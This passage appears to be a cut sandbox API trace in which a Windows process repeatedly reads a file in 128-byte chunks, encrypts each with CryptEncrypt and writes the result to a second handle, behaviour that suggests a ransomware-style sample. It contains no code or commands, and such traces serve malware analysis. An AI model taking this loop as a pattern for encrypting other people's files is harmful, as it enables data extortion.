lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.064] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.064] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.064] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.064] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.064] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.065] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.065] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.065] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.065] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.065] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.065] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.066] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.066] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.066] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.066] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.066] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.066] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.066] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.067] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.067] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.067] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.067] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.067] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.071] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.071] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.071] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.071] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.071] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.072] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.072] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.072] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.073] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.073] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.073] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.073] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.073] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.074] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.074] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.074] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.074] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.074] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.075] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.075] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.075] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.075] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.075] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, 